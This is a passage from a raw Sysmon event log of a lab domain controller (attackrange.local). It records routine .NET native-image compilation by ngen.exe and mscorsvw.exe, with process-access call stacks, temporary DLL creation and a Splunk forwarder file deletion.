319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:24.478{4DB9351A-A1D8-60D3-BD03-00000000CF01}7164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bfc-0\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll2021-06-23 21:04:24.478 10341000x800000000000000020747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.431{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-BD03-00000000CF01}7164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.415{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-BD03-00000000CF01}7164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.415{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-BD03-00000000CF01}7164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.384{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-BC03-00000000CF01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.368{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-BC03-00000000CF01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.368{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-BC03-00000000CF01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:24.337{4DB9351A-A1D8-60D3-BB03-00000000CF01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f50-0\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll2021-06-23 21:04:24.337 10341000x800000000000000020740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.243{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-BB03-00000000CF01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.212{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-BB03-00000000CF01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.212{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-BB03-00000000CF01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.166{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-BA03-00000000CF01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.150{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-BA03-00000000CF01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.150{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-BA03-00000000CF01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:24.134{4DB9351A-A1D7-60D3-B903-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15d8-0\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll2021-06-23 21:04:24.134 10341000x800000000000000020733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.993{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B903-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.775{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C703-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.759{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C703-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.759{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C703-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.650{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4B2435C1880DF9F60CB6DC31978A246,SHA256=5D7C8F5D43D2D836C4BAA1B921BCF1324354618171E40DB56D424788155DCDCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.650{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C603-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.618{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C603-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.618{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C603-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:25.587{4DB9351A-A1D9-60D3-C503-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c0c-0\Microsoft.Tpm.Commands.dll2021-06-23 21:04:25.587 10341000x800000000000000020778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.478{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C503-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.462{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C503-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 